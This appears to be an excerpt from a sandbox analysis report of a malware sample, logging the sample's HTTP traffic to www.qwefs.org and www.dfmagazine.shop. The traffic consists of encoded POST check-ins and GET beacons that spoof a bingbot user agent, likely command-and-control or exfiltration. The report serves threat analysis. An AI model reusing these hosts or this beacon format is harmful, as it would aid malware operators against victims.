                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.74970745.114.171.236806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:21.753019094 CEST628OUTPOST /toq1/ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.qwefs.org
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.qwefs.org/toq1/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 6a 48 70 6e 4e 31 66 4b 76 6d 69 46 39 6b 30 53 6c 6d 68 6e 69 35 35 31 50 42 65 4c 6a 36 59 6d 53 53 54 66 37 52 54 6f 53 52 39 7a 67 49 42 53 61 31 63 4c 30 45 47 6e 6e 74 53 78 71 4c 65 4c 69 37 36 57 78 35 47 36 4f 6b 78 52 62 52 50 69 67 6c 4f 75 51 47 79 31 6d 4a 79 2f 48 74 42 41 6d 53 5a 70 68 6e 59 50 75 38 52 6e 79 58 4b 78 57 79 7a 42 63 49 38 36 44 7a 2b 6f 41 48 77 4a 37 6d 77 38 74 6e 56 53 69 44 45 39 51 71 44 62 35 5a 34 6e 5a 62 6b 4e 4b 2f 48 7a 64 41 71 57 61 75 37 58 44 45 7a 6a 4b 74 35 6f 53 2b 6f 65 79 6d 34 64 79 2f 4c 73 54 32 36 45 39 66 30 72 35 35 46 39 36 31 43 6a 67 53 30 2b 46 34 36 53 70 69 74 52 74 38 47 78 31 70 4e 55 78 49 43 42 69 6f 67 50 50 52 4d 3d
                            Data Ascii: Z0=jHpnN1fKvmiF9k0Slmhni551PBeLj6YmSSTf7RToSR9zgIBSa1cL0EGnntSxqLeLi76Wx5G6OkxRbRPiglOuQGy1mJy/HtBAmSZphnYPu8RnyXKxWyzBcI86Dz+oAHwJ7mw8tnVSiDE9QqDb5Z4nZbkNK/HzdAqWau7XDEzjKt5oS+oeym4dy/LsT26E9f0r55F961CjgS0+F46SpitRt8Gx1pNUxICBiogPPRM=
                            Sep 26, 2024 15:24:22.593822002 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:12 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.74970845.114.171.236806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:24.422683954 CEST1641OUTPOST /toq1/ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.qwefs.org
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.qwefs.org/toq1/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 6a 48 70 6e 4e 31 66 4b 76 6d 69 46 39 6b 30 53 6c 6d 68 6e 69 35 35 31 50 42 65 4c 6a 36 59 6d 53 53 54 66 37 52 54 6f 53 52 31 7a 67 36 4a 53 61 57 30 4c 31 45 47 6e 6b 74 53 77 71 4c 66 4f 69 36 53 53 78 35 4b 4d 4f 6d 4a 52 61 79 33 69 30 45 4f 75 65 47 79 31 76 70 79 36 44 74 42 56 6d 53 4a 74 68 6e 6f 50 75 38 52 6e 79 53 4f 78 55 6a 7a 42 65 49 38 35 4a 54 2b 30 4b 58 77 68 37 6d 70 42 74 6e 68 6f 69 7a 6b 39 51 4a 37 62 2f 76 4d 6e 44 62 6b 44 47 66 48 72 64 41 6d 7a 61 75 6d 6b 44 48 76 46 4b 71 56 6f 52 66 5a 4b 6d 6e 4d 44 74 39 6a 54 55 48 76 6d 77 5a 70 59 38 35 68 72 79 47 32 45 72 41 45 37 44 35 62 62 6f 55 4d 4e 33 74 61 64 32 4c 46 34 33 4a 58 6f 39 64 6f 44 52 57 67 77 77 4e 6f 38 4f 6c 49 69 41 73 45 45 69 75 6d 2b 4b 68 68 35 42 67 50 77 4a 50 35 54 55 42 61 4e 50 68 77 36 64 43 69 49 34 79 30 62 63 43 37 49 62 66 34 79 72 2b 6d 79 57 6f 4d 6a 4d 71 32 38 35 4f 47 50 74 6e 4e 69 7a 6c 55 63 62 50 45 58 56 30 7a 58 6b 66 71 78 4f 49 50 48 52 65 6e 6c 2f 46 57 66 69 70 44 [TRUNCATED]
                            Data Ascii: Z0=jHpnN1fKvmiF9k0Slmhni551PBeLj6YmSSTf7RToSR1zg6JSaW0L1EGnktSwqLfOi6SSx5KMOmJRay3i0EOueGy1vpy6DtBVmSJthnoPu8RnySOxUjzBeI85JT+0KXwh7mpBtnhoizk9QJ7b/vMnDbkDGfHrdAmzaumkDHvFKqVoRfZKmnMDt9jTUHvmwZpY85hryG2ErAE7D5bboUMN3tad2LF43JXo9doDRWgwwNo8OlIiAsEEium+Khh5BgPwJP5TUBaNPhw6dCiI4y0bcC7Ibf4yr+myWoMjMq285OGPtnNizlUcbPEXV0zXkfqxOIPHRenl/FWfipDqhpQjXHsPyRv6NN07DNLn55rVzizgEaJZrAHYgxF3wH61RyI7Z/sJPafw8WnNNYkfmX+aQ+HGE3jJErS/nMsLN/kJma1RpC9/cQQkKJ86Wr80wLGtD56s+AeA9fT1FmzpB8bYpwC7ny9z1P5cfH40FOHHQEK5wqC/npoZZRRFYQMyu7Aq/TK6ikrKT+OrzoX8KlDxoXuJqZeqJJt2Cj3ktAajU0kfHmNipPbfZEXM7XXdYwsmhz/1mvaSc62MZudtEKoWRM3fAYMRk/oNAtYwxVT7rNyULJhfjMJsayI2ZBl/HMnoo5x198VJ55ajLMQ5BKHtfAjjbRaQ/a/RVPZnbPek2QPY5ydVvxa30tUUpMFcYeWu3SlPXyPJ9VoZ5UevaVUwmtkR5+PZ0/E2vlS3qucSHUijWEdmkaI5/vtD7AXatc/juiFrELGC1OgSensRrAErWVjm+TXD1L/3qPLAwCsYUMvtPdYtZaAhec5TyEhoCRG3ZVA3NZYQeDumpxR0BChDcWXw8TknLO9Vz3IM6iGEKmxixbbYkXujb0U8bNxhB6pq8glpb4qAid7oS2+f0+n2ZSDm4o0mHegexCPprYDU7+bmHJEn8JYlXVvGhfUYduIPxYu+1A18tlxx5rmh6D5VsmFwFL7W7rIu5z3cJ0JKzE0IzziUn [TRUNCATED]
                            Sep 26, 2024 15:24:25.278573036 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:15 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.74970945.114.171.236806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:26.967686892 CEST350OUTGET /toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ HTTP/1.1
                            Host: www.qwefs.org
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:27.817737103 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 26 Sep 2024 13:25:17 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.74971084.32.84.32806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:32.899966002 CEST626OUTPOST /wc8m/ HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.dfmagazine.shop
                            Content-Length: 215
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.dfmagazine.shop/wc8m/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 47 50 59 66 45 30 72 57 2f 39 75 43 4e 4d 78 4b 71 53 50 63 2f 73 77 61 78 47 65 6e 68 78 70 79 57 51 6a 4d 30 53 70 2f 5a 67 48 71 2f 39 4c 70 49 41 69 76 57 32 32 6a 56 30 63 55 6b 4b 67 79 76 2f 46 4e 52 49 47 56 44 43 74 4d 68 76 34 51 42 6b 64 71 6a 74 70 70 34 45 2f 46 4b 63 30 59 59 46 73 32 61 71 53 43 50 6d 61 47 34 52 49 6e 46 67 55 68 6a 46 4b 75 48 36 37 7a 69 72 63 59 44 47 2f 44 4c 6d 65 37 32 4e 4a 63 37 57 48 6e 45 34 46 78 7a 7a 76 65 54 63 6d 75 49 35 42 58 79 54 58 63 4e 5a 36 59 4f 39 72 79 4a 37 4d 50 6c 75 67 53 70 6e 71 2f 72 32 6f 32 54 45 6a 41 44 44 42 4a 51 77 79 50 46 55 66 4b 54 2f 43 44 69 51 3d 3d
                            Data Ascii: Z0=GPYfE0rW/9uCNMxKqSPc/swaxGenhxpyWQjM0Sp/ZgHq/9LpIAivW22jV0cUkKgyv/FNRIGVDCtMhv4QBkdqjtpp4E/FKc0YYFs2aqSCPmaG4RInFgUhjFKuH67zircYDG/DLme72NJc7WHnE4FxzzveTcmuI5BXyTXcNZ6YO9ryJ7MPlugSpnq/r2o2TEjADDBJQwyPFUfKT/CDiQ==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.74971184.32.84.32806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:35.441225052 CEST646OUTPOST /wc8m/ HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.dfmagazine.shop
                            Content-Length: 235
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.dfmagazine.shop/wc8m/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 47 50 59 66 45 30 72 57 2f 39 75 43 50 74 42 4b 6f 31 6a 63 71 38 77 64 74 57 65 6e 72 52 70 70 57 51 76 4d 30 57 78 76 4d 44 6a 71 2b 64 37 70 4a 42 69 76 62 57 32 6a 64 55 63 56 70 71 67 73 76 2f 5a 46 52 4b 53 56 44 43 4a 4d 68 72 77 51 43 54 78 72 67 64 70 33 73 30 2f 48 41 38 30 59 59 46 73 32 61 72 32 6b 50 6d 53 47 34 68 34 6e 45 46 67 69 70 6c 4b 74 50 61 37 7a 6d 72 63 63 44 47 2b 6b 4c 6e 53 52 32 50 78 63 37 53 50 6e 45 70 46 79 6b 6a 76 63 5a 38 6e 47 50 4b 63 4d 6f 6a 4c 6b 41 35 2f 5a 42 4e 47 53 42 74 52 74 2f 4d 73 2b 33 32 53 45 76 30 4d 41 45 69 2b 31 42 43 46 52 64 53 47 75 61 6a 36 67 65 74 6a 48 30 6a 6c 57 4b 62 38 50 38 54 6d 66 4b 6e 78 30 7a 70 53 59 2f 57 77 3d
                            Data Ascii: Z0=GPYfE0rW/9uCPtBKo1jcq8wdtWenrRppWQvM0WxvMDjq+d7pJBivbW2jdUcVpqgsv/ZFRKSVDCJMhrwQCTxrgdp3s0/HA80YYFs2ar2kPmSG4h4nEFgiplKtPa7zmrccDG+kLnSR2Pxc7SPnEpFykjvcZ8nGPKcMojLkA5/ZBNGSBtRt/Ms+32SEv0MAEi+1BCFRdSGuaj6getjH0jlWKb8P8TmfKnx0zpSY/Ww=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.74971284.32.84.32806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:37.986656904 CEST1659OUTPOST /wc8m/ HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.dfmagazine.shop
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.dfmagazine.shop/wc8m/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 47 50 59 66 45 30 72 57 2f 39 75 43 50 74 42 4b 6f 31 6a 63 71 38 77 64 74 57 65 6e 72 52 70 70 57 51 76 4d 30 57 78 76 4d 44 72 71 2f 75 7a 70 4a 69 36 76 61 57 32 6a 63 55 63 51 70 71 68 70 76 2f 52 42 52 4b 66 67 44 41 42 4d 68 4a 6f 51 4b 43 78 72 37 4e 70 33 75 30 2f 61 4b 63 30 4e 59 45 42 39 61 71 47 6b 50 6d 53 47 34 69 67 6e 44 51 55 69 76 6c 4b 75 48 36 37 76 69 72 63 34 44 41 58 62 4c 6e 47 72 32 66 52 63 37 79 66 6e 46 62 74 79 6e 44 76 61 65 38 6e 65 50 4b 51 70 6f 6a 48 4f 41 36 69 52 42 4f 57 53 52 70 6b 54 6a 64 51 54 69 56 43 50 6b 79 74 6d 44 42 4b 42 4f 43 39 32 62 44 65 6f 51 78 44 56 48 2f 50 6e 2b 54 38 43 62 72 4d 37 77 7a 4b 56 4d 53 77 6e 73 71 79 59 38 42 73 58 4a 6d 75 4d 65 4c 72 77 57 34 67 4b 5a 63 6d 76 53 76 2f 49 4b 52 35 6e 48 4e 4e 72 4a 71 63 7a 66 68 53 4d 51 38 79 4d 55 49 66 34 76 4f 4b 6a 49 70 30 58 65 78 74 6f 4c 69 7a 47 69 71 6e 67 50 63 77 72 4c 46 54 56 33 4e 65 77 71 4c 59 37 32 78 4e 63 64 37 5a 77 48 47 47 4b 47 4d 66 71 35 50 68 7a 55 45 44 [TRUNCATED]
                            Data Ascii: Z0=GPYfE0rW/9uCPtBKo1jcq8wdtWenrRppWQvM0WxvMDrq/uzpJi6vaW2jcUcQpqhpv/RBRKfgDABMhJoQKCxr7Np3u0/aKc0NYEB9aqGkPmSG4ignDQUivlKuH67virc4DAXbLnGr2fRc7yfnFbtynDvae8nePKQpojHOA6iRBOWSRpkTjdQTiVCPkytmDBKBOC92bDeoQxDVH/Pn+T8CbrM7wzKVMSwnsqyY8BsXJmuMeLrwW4gKZcmvSv/IKR5nHNNrJqczfhSMQ8yMUIf4vOKjIp0XextoLizGiqngPcwrLFTV3NewqLY72xNcd7ZwHGGKGMfq5PhzUEDkFQE3bYT+5bh6kqoQoup3nFXGD0wCAeluzonGxaFCrp5WRjJgHPzZkFbgwtfl8Y4W49Ya9jLGmxXC1X/wLFeWEUBZkXSDJzob/BB5PQrva2ra8KPKpoBALhiR7dKmaC63aBPab6xb/mQXWRNSDT7cipid45wJrBT0UZECsyFSQE4/g0fkMe+3QVPkV19kK6ZISXraMD530o9XpduFhjyTzvj1V7rfMxsr+7p/rcSolrZnw8p7oH3LamX/VQ0SupeGTHHIOy4YCKItY7lHHaUDci2AE2eQe1H+wi/RkCI0jZoF3nXuI/4Bi12eA/+16fmH/oznhUfz0SNEiPt01NA5gtBtPfL020QJRR9aCrUjY7h3pOjFWZnVAdq7YuGYtjuTLZ7F9K3QPrZQNf/+IDBstFpMR1/30Gvy3PP1P9xse8JUMPogGRiGuMeaXE4fYBxk0L4ox/phFpisOFhBehuEODvL4+Za/sN0/JGfHRgA36XDpiBiqdRmQKj30p1CbtVYD2vbMEh2GOkSTPKi7z7+chD/vhNcJwmz9BNlW9ngEI2q9OhUetRZD1MJVwkjipVCEFkRpIUf9mpKaTGLlX23MWjVWNTJw5wDD2GzI8YQKEEWkdp2Pre+JOtuk2aFHHFuTiRfgnkYEIJYpHKEiTyOLXdqGB9ec6ZK+ [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.74971384.32.84.32806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:24:40.530927896 CEST356OUTGET /wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT HTTP/1.1
                            Host: www.dfmagazine.shop
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:24:40.978070021 CEST1236INHTTP/1.1 200 OK
                            Server: hcdn
                            Date: Thu, 26 Sep 2024 13:24:40 GMT
                            Content-Type: text/html
                            Content-Length: 10072
                            Connection: close
                            Vary: Accept-Encoding
                            alt-svc: h3=":443"; ma=86400
                            x-hcdn-request-id: 815381f1f14368a99c07863653f8c1d9-bos-edge2
                            Expires: Thu, 26 Sep 2024 13:24:39 GMT
                            Cache-Control: no-cache
                            Accept-Ranges: bytes
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                            Sep 26, 2024 15:24:40.978085995 CEST224INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                            Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                            Sep 26, 2024 15:24:40.978123903 CEST1236INData Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                            Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                            Sep 26, 2024 15:24:40.978133917 CEST1236INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                            Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                            Sep 26, 2024 15:24:40.978141069 CEST1236INData Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                            Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                            Sep 26, 2024 15:24:40.978148937 CEST1236INData Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                            Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                            Sep 26, 2024 15:24:40.978156090 CEST896INData Raw: 6c 79 20 66 61 73 74 2c 20 73 65 63 75 72 65 20 61 6e 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65
                            Data Ascii: ly fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=co
                            Sep 26, 2024 15:24:40.978173018 CEST1236INData Raw: 76 65 72 73 2d 61 74 2d 68 6f 73 74 69 6e 67 65 72 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 43 68 61 6e 67 65 20 6e 61 6d 65 73 65 72 76 65 72 73 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76
                            Data Ascii: vers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCod
